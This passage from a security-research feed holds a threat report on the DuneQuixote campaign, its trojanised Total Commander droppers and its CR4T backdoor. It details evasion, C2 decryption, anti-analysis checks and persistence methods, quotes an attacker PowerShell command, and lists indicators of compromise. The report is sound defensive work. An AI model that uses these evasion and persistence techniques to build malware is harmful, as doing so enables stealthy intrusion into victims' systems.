  1423. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1424. </item>
  1425. <item>
  1426. <title>DuneQuixote campaign targets Middle Eastern entities with &#8220;CR4T&#8221; malware</title>
  1427. <link>https://securelist.com/dunequixote/112425/</link>
  1428. <comments>https://securelist.com/dunequixote/112425/#respond</comments>
  1430. <dc:creator><![CDATA[GReAT]]></dc:creator>
  1431. <pubDate>Thu, 18 Apr 2024 10:00:07 +0000</pubDate>
  1432. <category><![CDATA[APT reports]]></category>
  1433. <category><![CDATA[APT]]></category>
  1434. <category><![CDATA[Backdoor]]></category>
  1435. <category><![CDATA[Dropper]]></category>
  1436. <category><![CDATA[DuneQuixote]]></category>
  1437. <category><![CDATA[Malware]]></category>
  1438. <category><![CDATA[Malware Descriptions]]></category>
  1439. <category><![CDATA[Malware Technologies]]></category>
  1440. <category><![CDATA[Middle East]]></category>
  1441. <category><![CDATA[Targeted attacks]]></category>
  1442. <category><![CDATA[Trojan]]></category>
  1443. <category><![CDATA[APT (Targeted attacks)]]></category>
  1444. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112425</guid>
  1445.  
  1446. <description><![CDATA[New unattributed DuneQuixote campaign targeting entities in the Middle East employs droppers disguised as Total Commander installer and CR4T backdoor in C and Go.]]></description>
  1447. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  1448. <p>In February 2024, we discovered a new malware campaign targeting government entities in the Middle East. We dubbed it &#8220;DuneQuixote&#8221;; and our investigation uncovered over 30 DuneQuixote dropper samples actively employed in the campaign. These droppers, which exist in two versions – regular droppers and tampered installer files for a legitimate tool named &#8220;Total Commander&#8221;, carried malicious code to download an additional payload in the form of a backdoor we call &#8220;CR4T&#8221;. While we identified only two CR4T implants at the time of discovery, we strongly suspect the existence of others, which may be completely different malware.</p>
  1449. <p>The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code.</p>
  1450. <h2 id="initial-dropper">Initial dropper</h2>
  1451. <p>The initial dropper is a Windows x64 executable file, although there are also DLL versions of the malware sharing the same functionality. The malware is developed in C/C++ without utilizing the Standard Template Library (STL), and certain segments are coded in pure Assembler. All samples contain digital signatures, which are, however, invalid.</p>
  1452. <p>Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls primarily involve string comparison functions, executed without any conditional jumps based on the comparison results.</p>
  1453. <div id="attachment_112428" style="width: 805px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112428" class="size-full wp-image-112428" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png" alt="Useless function calls" width="795" height="417" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png 795w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-300x157.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-768x403.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-667x350.png 667w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-740x388.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-534x280.png 534w" sizes="(max-width: 795px) 100vw, 795px" /></a><p id="caption-attachment-112428" class="wp-caption-text">Useless function calls</p></div>
  1454. <p>The strings specified in these functions are snippets from Spanish poems. These vary from one sample to another, thereby altering the signature of each sample to evade detection using traditional detection methodologies. Following the execution of decoy functions, the malware proceeds to construct a structure for the necessary API calls. This structure is populated with offsets of Windows API functions, resolved utilizing several techniques.</p>
  1455. <p>Initially, the malware decrypts the names of essential Windows core DLLs using a straightforward XOR decryption algorithm. It employs multiple decryption functions to decode strings, where a single function might decrypt several strings. However, in our analysis, we observed samples where each string was decrypted using a dedicated function, each employing a slightly varied decryption algorithm.</p>
  1456. <div id="attachment_112429" style="width: 605px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112429" class="size-full wp-image-112429" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png" alt="String decryption algorithm" width="595" height="373" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png 595w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-300x188.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-558x350.png 558w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-447x280.png 447w" sizes="(max-width: 595px) 100vw, 595px" /></a><p id="caption-attachment-112429" class="wp-caption-text">String decryption algorithm</p></div>
  1457. <p>Once the necessary strings have been decrypted, the malware uses a standard technique for dynamically resolving API calls to obtain their memory offsets by:</p>
  1458. <ul>
  1459. <li>retrieving the offset of the Process Environment Block (PEB);</li>
  1460. <li>locating the export table offset of <em>kernel32.dll</em>;</li>
  1461. <li>identifying the offset for the GetProcAddress function.</li>
  1462. </ul>
  1463. <p>In the process of obtaining the PEB offset, the malware first decrypts the constant <em>0x60</em>, which is used to locate the PEB64 structure. This approach is of particular interest because, typically, malicious samples or shellcode utilizing this technique opt for a hardcoded plain text constant value for this purpose.</p>
  1464. <div id="attachment_112430" style="width: 436px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112430" class="size-full wp-image-112430" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png" alt="Getting PEB structure offset" width="426" height="88" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png 426w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03-300x62.png 300w" sizes="(max-width: 426px) 100vw, 426px" /></a><p id="caption-attachment-112430" class="wp-caption-text">Getting PEB structure offset</p></div>
  1465. <p>Next, the malware begins to populate the previously created structure with the offsets of all required functions.</p>
  1466. <p>The dropper then proceeds to decrypt the C2 (Command and Control) address, employing a unique technique designed to prevent the exposure of the C2 to automated malware analysis systems. This method involves first retrieving the filename under which the dropper was executed, then concatenating this filename with one of the hardcoded strings from Spanish poems. Following this, the dropper calculates the MD5 hash of the concatenated string, which is then used as a key for decrypting the C2 string.</p>
  1467. <div id="attachment_112431" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112431" class="size-large wp-image-112431" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1024x171.png" alt="C2 decryption algorithm" width="1024" height="171" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1024x171.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-300x50.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-768x128.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1536x256.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-740x124.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-800x134.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04.png 1545w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112431" class="wp-caption-text">C2 decryption algorithm</p></div>
  1468. <p>Following the decryption of the C2 string, the malware attempts to establish a connection with the C2 server using a specifically hardcoded ID as the user agent to download the payload. During our research of the C2 infrastructure, we found that the payload remains inaccessible for download unless the correct user agent is provided. Furthermore, it appears that the payload may only be downloaded once per victim or is only available for a brief period following the release of a malware sample into the wild, as we were unable to obtain most of the payload implants from active C2 servers.</p>
  1469. <p>Once the payload is downloaded into the process&#8217;s memory, the dropper performs a verification check for the &#8220;M&#8221; (<em>0x4D</em> in hexadecimal) magic byte at the start of the memory blob. This check likely serves to confirm that the payload has an MZ file signature, thereby indicating it is a valid executable format.</p>
  1470. <h2 id="total-commander-installer-dropper">Total Commander installer dropper</h2>
  1471. <p>The Total Commander installer dropper is created to mimic a <a href="https://www.ghisler.com/" target="_blank" rel="noopener">legitimate Total Commander </a>software installer. It is, in fact, the legitimate installer file, but with an added malicious file section (<em>.textbss</em>) and a modified entry point. This tampering results in invalidating the official digital signature of the Total Commander installer.</p>
  1472. <p>The installer dropper retains the core functionality of the initial dropper but with several key differences. Unlike the original dropper, it omits the use of Spanish poem strings and the execution of decoy functions. It also implements a series of anti-analysis measures and checks that prevent a connection to C2 resources, if any of the following conditions are true:</p>
  1473. <ul>
  1474. <li>a debugger is present in the system;</li>
  1475. <li>known research or monitoring tools are among running processes;</li>
  1476. <li><em>explorer.exe</em> process has more than two instances</li>
  1477. <li>any of the following processes are running:
  1478. <ul>
  1479. <li>&#8220;python.exe&#8221;</li>
  1480. <li>&#8220;taskmgr.exe&#8221;</li>
  1481. <li>&#8220;procmon.exe&#8221;</li>
  1482. <li>&#8220;resmon.exe&#8221;</li>
  1483. <li>&#8220;eventvwr.exe&#8221;</li>
  1484. <li>&#8220;process_hacker.exe&#8221;</li>
  1485. </ul>
  1486. </li>
  1487. <li>less than 8 GB RAM available;</li>
  1488. <li>the position of the cursor does not change over a certain timeframe;</li>
  1489. <li>disk capacity is less than 40 GB.</li>
  1490. </ul>
  1491. <p>If any of the anti-analysis checks fail, the malware returns a value of 1. This specific return value plays a role in the decryption of the C2 server address. It triggers the removal of the first &#8220;h&#8221; from the beginning of the C2 URL (&#8220;<em>https</em>&#8220;), effectively changing it to &#8220;<em>ttps</em>&#8220;. As a result, the altered URL prevents the establishment of a connection to the C2 server.</p>
  1492. <h2 id="memory-only-cr4t-implant">Memory-only CR4T implant</h2>
  1493. <p>The &#8220;CR4T&#8221; implant is designed with the primary goal of granting attackers access to a console for command line execution on the victim&#8217;s machine. Additionally, it facilitates the download, upload, and modification of files. The malware carries a PDB string in its code:</p><pre class="crayon-plain-tag">"C:\Users\user\Desktop\code\CR4T\x64\Release\CR4T.pdb"</pre><p>
  1494. That&#8217;s why we dubbed it &#8220;CR4T&#8221;.</p>
  1495. <p>Upon execution by the dropper, the implant initiates a <em>cmd.exe</em> process in a hidden window and establishes two named pipes to enable inter-process communication. It then configures the user agent for communication with the C2 server, embedding the hardcoded value &#8220;TroubleShooter&#8221; as the user agent name for requests to the C2.</p>
  1496. <div id="attachment_112432" style="width: 664px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112432" class="size-full wp-image-112432" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png" alt="User-agent string" width="654" height="132" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05.png 654w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122917/Dune_Quixote_05-300x61.png 300w" sizes="(max-width: 654px) 100vw, 654px" /></a><p id="caption-attachment-112432" class="wp-caption-text">User-agent string</p></div>
  1497. <p>After that, the implant retrieves the computer name of the infected host as well as the username of the current user. Then it establishes a connection to the C2 server. This session provides interactive access to the command line interface of the victim&#8217;s machine via the earlier mentioned named pipes. Commands and their outputs are encoded using Base64 before being sent and decoded after receiving.</p>
  1498. <p>After establishing the connection, the implant remains idle, awaiting an initial command from the C2 operator to activate the required functionality. This command is represented by a one-byte value, each one mapped to a specific action on the infected system. These single character commands would likely make more sense for an English-speaking developer/operator than a Spanish-speaking one. i.e. &#8220;D&#8221; == Download, &#8220;U&#8221; == Upload (where a Spanish speaker might use &#8220;Cargar&#8221;).</p>
  1499. <table width="100%">
  1500. <tbody>
  1501. <tr>
  1502. <td width="25%"><strong>Command</strong></td>
  1503. <td width="75%"><strong>Functionality</strong></td>
  1504. </tr>
  1505. <tr>
  1506. <td>&#8216;C'(0x43)</td>
  1507. <td>Provide access to the command line interface via a named pipe.</td>
  1508. </tr>
  1509. <tr>
  1510. <td>&#8216;D'(0x44)</td>
  1511. <td>Download file from the C2</td>
  1512. </tr>
  1513. <tr>
  1514. <td>&#8216;U'(0x55)</td>
  1515. <td>Upload file to the C2</td>
  1516. </tr>
  1517. <tr>
  1518. <td>&#8216;S'(0x53)</td>
  1519. <td>Sleep</td>
  1520. </tr>
  1521. <tr>
  1522. <td>&#8220;R&#8221;(0x52)</td>
  1523. <td>Exit process</td>
  1524. </tr>
  1525. <tr>
  1526. <td>&#8220;T&#8221;(0x57)</td>
  1527. <td>Write to a file (T here possibly stands for a file-write <em>task</em>)</td>
  1528. </tr>
  1529. </tbody>
  1530. </table>
  1531. <p>During our investigation, we discovered evidence of a PowerShell file that had been created using the &#8220;T&#8221; command:</p><pre class="crayon-plain-tag">"powershell -c \"Get-ScheduledTask | Where-Object {$_.TaskName -like 'User_Feed_Sync*' -and $_.State -eq 'Running'} | Select-Object TaskName\"</pre><p>
  1532. The threat actor was observed attempting to retrieve the names of all scheduled tasks on the infected machine beginning with &#8220;<em>User_Feed_Sync</em>&#8220;. These scheduled tasks were probably created by the Golang version of CR4T for persistence purposes.</p>
  1533. <h2 id="memory-only-golang-cr4t-implant">Memory-only Golang CR4T implant</h2>
  1534. <p>We also discovered a Golang version of the CR4T implant, which shares similar capabilities with the C version and has a similar string related to the internal naming:</p>
  1535. <pre class="crayon-plain-tag">"C:/Users/user/Desktop/code/Cr4tInst/main.go"</pre> </p>
  1536. <p>This variant provides a command line console for interaction with infected machines, as well as file download and upload capabilities. It also possesses the functionality to execute commands on the victim&#8217;s machine. A notable difference of this version is its ability to create scheduled tasks using the Golang <a href="https://github.com/go-ole/go-ole">Go-ole</a> library. This library leverages Windows Component Object Model (COM) object interfaces for interacting with the Task Scheduler service.</p>
  1537. <div id="attachment_112433" style="width: 716px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112433" class="size-full wp-image-112433" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png" alt=" CR4T using go-ole library" width="706" height="447" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-300x190.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-553x350.png 553w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17123128/Dune_Quixote_06-442x280.png 442w" sizes="(max-width: 706px) 100vw, 706px" /></a><p id="caption-attachment-112433" class="wp-caption-text">CR4T using go-ole library</p></div>
  1538. <p>The malware is also capable of achieving persistence by utilizing the <a href="https://cyberstruggle.org/2021/12/14/com-hijacking-for-persistence/" target="_blank" rel="noopener">COM objects hijacking</a> technique. And finally, it uses the Telegram API for C2 communications, implementing the public <a href="https://github.com/go-telegram-bot-api/telegram-bot-api" target="_blank" rel="noopener">Golang Telegram API</a> bindings. All the interactions are similar to the C/C++ version.</p>
  1539. <h2 id="infrastructure">Infrastructure</h2>
  1540. <p>The infrastructure used in this campaign appears to be located in the US at two different commercial hosters.</p>
  1541. <table width="100%">
  1542. <tbody>
  1543. <tr>
  1544. <td width="28%"><strong>Domain</strong></td>
  1545. <td width="28%"><strong>IP</strong></td>
  1546. <td width="28"><strong>First seen</strong></td>
  1547. <td width="16%"><strong>ASN</strong></td>
  1548. </tr>
  1549. <tr>
  1550. <td>commonline[.]space</td>
  1551. <td>135.148.113[.]161</td>
  1552. <td>2023 -12-16 23:20</td>
  1553. <td>16276</td>
  1554. </tr>
  1555. <tr>
  1556. <td>userfeedsync[.]com</td>
  1557. <td>104.36.229[.]249</td>
  1558. <td>2024-01-10 07:27</td>
  1559. <td>395092</td>
  1560. </tr>
  1561. </tbody>
  1562. </table>
  1563. <h2 id="victims">Victims</h2>
  1564. <p>We discovered victims in the Middle East, as per our telemetry, as early as February 2023. Additionally, there were several uploads to a semi-public malware scanning service at a later stage, more specifically starting on December 12 2023, with more than 30 submissions of the droppers in the period up to the end of January 2024. The majority of these uploads also originated from the Middle East. Other sources we suspect to be VPN exit nodes geo-located in South Korea, Luxembourg, Japan, Canada, Netherlands and the US.</p>
  1565. <h2 id="conclusions">Conclusions</h2>
  1566. <p>The &#8220;DuneQuixote&#8221; campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence. Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and resourcefulness of the threat actors behind this campaign.</p>
  1567. <h2 id="indicators-of-compromise">Indicators of Compromise</h2>
  1568. <p><strong>DuneQuixote Droppers</strong><br />
  1569. <a href="https://opentip.kaspersky.com/3aaf7f7f0a42a1cf0a0f6c61511978d7/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3aaf7f7f0a42a1cf0a0f6c61511978d7</a><br />
  1570. <a href="https://opentip.kaspersky.com/5759acc816274d38407038c091e56a5c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5759acc816274d38407038c091e56a5c</a><br />
  1571. <a href="https://opentip.kaspersky.com/606fdee74ad70f76618007d299adb0a4/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">606fdee74ad70f76618007d299adb0a4</a><br />
  1572. <a href="https://opentip.kaspersky.com/5a04d9067b8cb6bcb916b59dcf53bed3/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5a04d9067b8cb6bcb916b59dcf53bed3</a><br />
  1573. <a href="https://opentip.kaspersky.com/48c8e8cc189eef04a55ecb021f9e6111/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">48c8e8cc189eef04a55ecb021f9e6111</a><br />
  1574. <a href="https://opentip.kaspersky.com/7b9e85afa89670f46f884bb3bce262b0/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">7b9e85afa89670f46f884bb3bce262b0</a><br />
  1575. <a href="https://opentip.kaspersky.com/4f29f977e786b2f7f483b47840b9c19d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
  1576. <a href="https://opentip.kaspersky.com/9d20cc7a02121b515fd8f16b576624ef/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9d20cc7a02121b515fd8f16b576624ef</a><br />
  1577. <a href="https://opentip.kaspersky.com/4324cb72875d8a62a210690221cdc3f9/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4324cb72875d8a62a210690221cdc3f9</a><br />
  1578. <a href="https://opentip.kaspersky.com/3cc77c18b4d1629b7658afbf4175222c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">3cc77c18b4d1629b7658afbf4175222c</a><br />
  1579. <a href="https://opentip.kaspersky.com/6cfec4bdcbcf7f99535ee61a0ebae5dc/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">6cfec4bdcbcf7f99535ee61a0ebae5dc</a><br />
  1580. <a href="https://opentip.kaspersky.com/c70763510953149fb33d06bef160821c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c70763510953149fb33d06bef160821c</a><br />
  1581. <a href="https://opentip.kaspersky.com/f3988b8aaaa8c6a9ec407cf5854b0e3b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f3988b8aaaa8c6a9ec407cf5854b0e3b</a><br />
  1582. <a href="https://opentip.kaspersky.com/cf4bef8537c6397ba07de7629735eb4e/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cf4bef8537c6397ba07de7629735eb4e</a><br />
  1583. <a href="https://opentip.kaspersky.com/1bba771b9a32f0aada6eaee64643673a/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">1bba771b9a32f0aada6eaee64643673a</a><br />
  1584. <a href="https://opentip.kaspersky.com/72c4d9bc1b59da634949c555b2a594b1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">72c4d9bc1b59da634949c555b2a594b1</a><br />
  1585. <a href="https://opentip.kaspersky.com/cc05c7bef5cff67bc74fda2fc96ddf7b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">cc05c7bef5cff67bc74fda2fc96ddf7b</a><br />
  1586. <a href="https://opentip.kaspersky.com/0fdbe82d2c8d52ac912d698bb8b25abc/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0fdbe82d2c8d52ac912d698bb8b25abc</a><br />
  1587. <a href="https://opentip.kaspersky.com/9b991229fe1f5d8ec6543b1e5ae9beb4/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">9b991229fe1f5d8ec6543b1e5ae9beb4</a><br />
  1588. <a href="https://opentip.kaspersky.com/5e85dc7c6969ce2270a06184a8c8e1da/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5e85dc7c6969ce2270a06184a8c8e1da</a><br />
  1589. <a href="https://opentip.kaspersky.com/71a8b4b8d9861bf9ac6bd4b0a60c3366/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">71a8b4b8d9861bf9ac6bd4b0a60c3366</a><br />
  1590. <a href="https://opentip.kaspersky.com/828335d067b27444198365fac30aa6be/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">828335d067b27444198365fac30aa6be</a><br />
  1591. <a href="https://opentip.kaspersky.com/84ae9222c86290bf585851191007ba23/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">84ae9222c86290bf585851191007ba23</a><br />
  1592. <a href="https://opentip.kaspersky.com/450e589680e812ffb732f7e889676385/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">450e589680e812ffb732f7e889676385</a><br />
  1593. <a href="https://opentip.kaspersky.com/56d5589e0d6413575381b1f3c96aa245/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">56d5589e0d6413575381b1f3c96aa245</a><br />
  1594. <a href="https://opentip.kaspersky.com/258b7f20db8b927087d74a9d6214919b/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">258b7f20db8b927087d74a9d6214919b</a><br />
  1595. <a href="https://opentip.kaspersky.com/a4011d2e4d3d9f9fe210448dd19c9d9a/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a4011d2e4d3d9f9fe210448dd19c9d9a</a><br />
  1596. <a href="https://opentip.kaspersky.com/b0e19a9fd168af2f7f6cf997992b1809/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b0e19a9fd168af2f7f6cf997992b1809</a><br />
  1597. <a href="https://opentip.kaspersky.com/0d740972c3dff09c13a5193d19423da1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">0d740972c3dff09c13a5193d19423da1 </a><br />
  1598. <a href="https://opentip.kaspersky.com/a0802a787537de1811a81d9182be9e7c/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">a0802a787537de1811a81d9182be9e7c</a><br />
  1599. <a href="https://opentip.kaspersky.com/5200fa68b6d40bb60d4f097b895516f0/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5200fa68b6d40bb60d4f097b895516f0</a><br />
  1600. <a href="https://opentip.kaspersky.com/abf16e31deb669017e10e2cb8cc144c8/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">abf16e31deb669017e10e2cb8cc144c8</a><br />
  1601. <a href="https://opentip.kaspersky.com/f151be4e882352ec42a336ca6bff7e3d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f151be4e882352ec42a336ca6bff7e3d</a><br />
  1602. <a href="https://opentip.kaspersky.com/f1b6aa55ba3bb645d3fde78abda984f3/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">f1b6aa55ba3bb645d3fde78abda984f3</a><br />
  1603. <a href="https://opentip.kaspersky.com/00130e1e7d628c8b5e2f9904ca959cd7/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">00130e1e7d628c8b5e2f9904ca959cd7</a><br />
  1604. <a href="https://opentip.kaspersky.com/fb2b916e44abddd943015787f6a8dc35/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">fb2b916e44abddd943015787f6a8dc35</a><br />
  1605. <a href="https://opentip.kaspersky.com/996c4f78a13a8831742e86c052f19c20/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">996c4f78a13a8831742e86c052f19c20</a><br />
  1606. <a href="https://opentip.kaspersky.com/4f29f977e786b2f7f483b47840b9c19d/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
  1607. <a href="https://opentip.kaspersky.com/91472c23ef5e8b0f8dda5fa9ae9afa94/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">91472c23ef5e8b0f8dda5fa9ae9afa94</a><br />
  1608. <a href="https://opentip.kaspersky.com/135abd6f35721298cc656a29492be255/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">135abd6f35721298cc656a29492be255</a><br />
  1609. <a href="https://opentip.kaspersky.com/db786b773cd75483a122b72fdc392af6/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">db786b773cd75483a122b72fdc392af6</a></p>
  1610. <p><strong>Domains and IPs </strong><br />
  1611. <a href="https://opentip.kaspersky.com/Commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">Commonline[.]space </a><br />
  1612. <a href="https://opentip.kaspersky.com/g1sea23g.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">g1sea23g.commonline[.]space</a><br />
  1613. <a href="https://opentip.kaspersky.com/tg1sea23g.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SLtarget="_blank" rel="noopener">tg1sea23g.commonline[.]space</a><br />
  1614. <a href="https://opentip.kaspersky.com/telemetry.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.commonline[.]space</a><br />
  1615. <a href="https://opentip.kaspersky.com/telemetry.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">e1awq1lp.commonline[.]space</a><br />
  1616. <a href="https://opentip.kaspersky.com/mc.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">mc.commonline[.]space</a><br />
  1617. <a href="https://opentip.kaspersky.com/userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">userfeedsync[.]com</a><br />
  1618. <a href="https://opentip.kaspersky.com/Service.userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">Service.userfeedsync[.]com</a><br />
